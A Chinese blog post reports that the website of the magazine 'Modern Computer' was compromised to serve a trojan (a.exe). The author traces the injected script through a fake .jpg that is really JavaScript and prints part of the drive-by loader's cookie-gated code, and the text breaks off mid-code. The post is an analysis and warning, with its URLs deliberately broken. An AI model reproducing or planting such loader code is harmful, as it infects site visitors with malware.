《现代计算机》杂志网站被挂木马

     近几天写论文，所以搜索了写杂志社网站，准备投稿。

      google上搜索到“现代计算机 期刊”，搜索到的第一个是http_://www.mcpop.cn/  (为了防止网友不小心点击了链接，在http后添加了个_，下面相同)，一打开IE防漏墙就报告网页企图执行a.exe，明显有问题。

     于是简单分析了下页面。先用flashget下载主页面回来本地，ultraedit打开，没有找到常见的使用“

document.write('');

   有猫腻。同样用flashget下载http_://a-l.meibu.com，得到一行代码

明显sc,jpg只是后缀名为jpg，实则js，再下载http_://a-l.meibu.com/sc.jpg，打开后得到

=======================================

function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "npconfig="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "npconfig=ocstird;expires="+ Then.toGMTString()
document.write("